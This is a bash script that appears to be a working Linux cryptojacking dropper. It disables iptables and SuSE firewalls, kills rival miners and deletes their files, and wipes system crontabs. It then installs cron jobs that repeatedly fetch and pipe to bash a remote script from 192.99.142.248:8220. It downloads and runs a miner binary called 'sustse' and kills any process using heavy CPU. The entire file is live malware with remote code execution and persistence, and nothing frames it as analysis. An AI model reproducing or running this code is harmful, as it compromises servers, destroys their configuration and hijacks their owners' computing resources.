1 #!/bin/bash
2 mkdir /var/tmp
3 chattr -i /usr/bin/wget
4 chmod 755 /usr/bin/wget
5 chattr -i /usr/bin/curl
6 chmod 755 /usr/bin/curl
7 /etc/init.d/iptables stop
8 service iptables stop
9 SuSEfirewall2 stop
10 reSuSEfirewall2 stop
11 pkill -f sysxlj
12 pkill -f jourxlv
13 pkill -f sustes
14 touch /etc/ld.so.preload
15 netstat -antp | grep '56415' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
16 netstat -antp | grep '139.99.120.75' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
17 rm -rf /usr/lib/void.so
18 rm -rf /etc/voidonce.sh
19 rm -rf /usr/local/lib/libjdk.so
20 rm -rf /usr/local/lib/libntp.so
21 ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9
22 sed -i '$d' /etc/crontab
23 rm -rf /lib64/library1.so
24 rm -rf /usr/lib64/library1.so
25 iptables -I OUTPUT -s 167.99.166.61 -j DROP
26 iptables -I INPUT -s 167.99.166.61 -j DROP
27 iptables -I OUTPUT -p tcp -m string --string "pastebin" --algo bm -j DROP
28 iptables -I OUTPUT -p udp -m string --string "pastebin" --algo kmp -j DROP
29 rm -rf /etc/cron.monthly/oanacroner
30 rm -rf /etc/cron.daily/oanacroner
31 rm -rf /etc/cron.hourly/oanacroner
32 rm -rf /usr/local/bin/dns
33 echo "" > /etc/crontab
34 echo "" > /etc/cron.d/root
35 echo "" > /etc/cron.d/apache
36 echo "" > /var/spool/cron/root
37 echo "" > /var/spool/cron/crontabs/root
38 chkconfig --del netdns
39 pkill -f netdns
40 echo "" > /etc/cron.d/system
41 chmod 777 /var/tmp
42 rm -rf /usr/local/bin/dns
43 rm -rf /usr/sbin/netdns
44 rm -rf /etc/init.d/netdns
45 rm -rf /etc/cron.monthly/oanacroner
46 rm -rf /etc/cron.daily/oanacroner
47 rm -rf /etc/cron.hourly/oanacroner
48 chattr -i /usr/local/lib/libntpd.so
49 chmod 777 /usr/local/lib/libntpd.so
50 rm -rf /usr/local/lib/libntpd.so
51 sed -i '/libntpd.so/d' /etc/ld.so.preload
52 crontab -l | sed '/pastebin.com/d' | crontab -
53 netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
54 netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
55 netstat -antp | grep '104.160.171.94|170.178.178.57|91.236.182.1|52.15.72.79|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
56 netstat -antp | grep '104.160.171.94|170.178.178.57|91.236.182.1|52.15.72.79|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
57 netstat -antp | grep '104.160.171.94|170.178.178.57|91.236.182.1|52.15.72.79|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
58 netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
59 netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
60 netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
61 netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
62 pkill -f /usr/bin/.sshd
63 netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
64 rm -rf /var/tmp/j*
65 rm -rf /tmp/j*
66 rm -rf /var/tmp/java
67 rm -rf /tmp/java
68 rm -rf /var/tmp/java2
69 rm -rf /tmp/java2
70 rm -rf /var/tmp/java*
71 rm -rf /tmp/java*
72 chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
73 chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
74 rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate
75 rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
76 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
77 rm -rf /tmp/*index_bak*
78 rm -rf /tmp/*httpd.conf*
79 rm -rf /tmp/*httpd.conf
80 rm -rf /tmp/a7b104c270
81 rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
82 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
83 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
84 echo -e "*/1 * * * * root (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /etc/cron.d/root
85 echo -e "*/2 * * * * root (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /etc/cron.d/apache
86 echo -e "*/30 * * * * (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /var/spool/cron/root
87 mkdir -p /var/spool/cron/crontabs
88 echo -e "* * * * * (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /var/spool/cron/crontabs/root
89 mkdir -p /etc/cron.hourly
90 (curl -fsSL --connect-timeout 120 http://192.99.142.248:8220/11 -o /etc/cron.hourly/oanacroner1||http://192.99.142.248:8220/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
91 chmod 777 /var/tmp/sustse
92 ps aux | grep -vw 'kworkerds|sustse' | awk '{if($3>30.0) print $2}' | while read procid
93 do
94 kill -9 $procid
95 done
96 ps ax | grep /tmp/ | grep -v grep | grep -v 'kworkerds|sustse|kworkerds|sustse|ppl' | awk '{print $1}' | xargs kill -9
97 ps ax | grep 'wc.conf|wq.conf|wm.conf' | grep -v grep | grep -v 'kworkerds|sustse|kworkerds|sustse|ppl' | awk '{print $1}' | xargs kill -9
98 netstat -ant|grep '158.69.133.18:80|192.99.142.249:3333|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep
99 if [ $? -eq 0 ]
100 then
101 pwd
102 else
103 curl http://192.99.142.248:8220/2mr.sh | bash -sh
104 fi
105 sleep 2
106 netstat -ant|grep '158.69.133.18:80|192.99.142.249:3333|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep
107 if [ $? -eq 0 ]
108 then
109 pwd
110 else
111 curl http://192.99.142.248:8220/3mr.sh | bash -sh
112 fi
113 DIR="/var/tmp"
114 if [ -a "/var/tmp/sustse" ]
115 then
116 if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ]
117 then
118 if [ -x "$(command -v md5sum)" ]
119 then
120 sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }')
121 echo $sum
122 case $sum in
123 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
124 echo "sustse OK"
125 ;;
126 *)
127 echo "sustse wrong"
128 pkill -f wc.conf
129 pkill -f sustse
130 sleep 4
131 ;;
132 esac
133 fi
134 echo "P OK"
135 else
136 DIR=$(mktemp -d)/var/tmp
137 mkdir $DIR
138 echo "T DIR $DIR"
139 fi
140 else
141 if [ -d "/var/tmp" ]
142 then
143 DIR="/var/tmp"
144 fi
145 echo "P NOT EXISTS"
146 fi
147 if [ -d "/var/tmp/sustse" ]
148 then
149 DIR=$(mktemp -d)/var/tmp
150 mkdir $DIR
151 echo "T DIR $DIR"
152 fi
153 WGET="wget -O"
154 if [ -s /usr/bin/curl ];
155 then
156 WGET="curl -o";
157 fi
158 if [ -s /usr/bin/wget ];
159 then
160 WGET="wget -O";
161 fi
162 f2="192.99.142.248:8220"
163
164 downloadIfNeed()
165 {
166 if [ -x "$(command -v md5sum)" ]
167 then
168 if [ ! -f $DIR/sustse ]; then
169 echo "File not found!"
170 download
171 fi
172 sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
173 echo $sum
174 case $sum in
175 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
176 echo "sustse OK"
177 ;;
178 *)
179 echo "sustse wrong"
180 sizeBefore=$(du $DIR/sustse)
181 if [ -s /usr/bin/curl ];
182 then
183 WGET="curl -k -o ";
184 fi
185 if [ -s /usr/bin/wget ];
186 then
187 WGET="wget --no-check-certificate -O ";
188 fi
189 #$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse
190 download
191 sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }')
192 if [ -s /usr/bin/curl ];
193 then
194 echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt
195 fi
196 ;;
197 esac
198 else
199 echo "No md5sum"
200 download
201 fi
202 }
203
204 download() {
205 if [ -x "$(command -v md5sum)" ]
206 then
207 sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }')
208 echo $sum
209 case $sum in
210 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
211 echo "sustse OK"
212 cp $DIR/sustse3 $DIR/sustse
213 ;;
214 *)
215 echo "sustse wrong"
216 download2
217 ;;
218 esac
219 else
220 echo "No md5sum"
221 download2
222 fi
223 }
224
225 download2() {
226 if [ `getconf LONG_BIT` = "64" ]
227 then
228 $WGET $DIR/sustse http://192.99.142.248:8220/tte2
229 fi
230
231 if [ -x "$(command -v md5sum)" ]
232 then
233 sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
234 echo $sum
235 case $sum in
236 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
237 echo "sustse OK"
238 cp $DIR/sustse $DIR/sustse3
239 ;;
240 *)
241 echo "sustse wrong"
242 ;;
243 esac
244 else
245 echo "No md5sum"
246 fi
247 }
248
249 judge() {
250 if [ ! "$(netstat -ant|grep '158.69.133.18:80|192.99.142.249:3333|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep)" ];
251 then
252 ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
253 do
254 kill -9 $procid
255 done
256 downloadIfNeed
257 touch /var/tmp/123
258 pkill -f /var/tmp/java
259 pkill -f w.conf
260 chmod +x $DIR/sustse
261 $WGET $DIR/wc.conf http://$f2/wt.conf
262 nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
263 sleep 5
264 else
265 echo "Running"
266 fi
267 }
268
269 judge2() {
270 if [ ! "$(ps -fe|grep 'sustse'|grep 'wc.conf'|grep -v grep)" ];
271 then
272 downloadIfNeed
273 chmod +x $DIR/sustse
274 $WGET $DIR/wc.conf http://$f2/wt.conf
275 nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
276 sleep 5
277 else
278 echo "Running"
279 fi
280 }
281
282 if [ ! "$(netstat -ant|grep 'LISTEN|ESTABLISHED|TIME_WAIT'|grep -v grep)" ];
283 then
284 judge2
285 else
286 judge
287 fi
288
289 if crontab -l | grep -q "192.99.142.248:8220"
290 then
291 echo "Cron exists"
292 else
293 crontab -r
294 echo "Cron not found"
295 LDR="wget -q -O -"
296 if [ -s /usr/bin/curl ];
297 then
298 LDR="curl";
299 fi
300 if [ -s /usr/bin/wget ];
301 then
302 LDR="wget -q -O -";
303 fi
304 (crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
305 fi
306 rm -rf /var/tmp/jrm
307 rm -rf /tmp/jrm
308 pkill -f 185.222.210.59
309 pkill -f 95.142.40.81
310 pkill -f 158.69.133.18
311 chmod 777 /var/tmp/sustse
312 crontab -l | sed '/185.222.210.59/d' | crontab -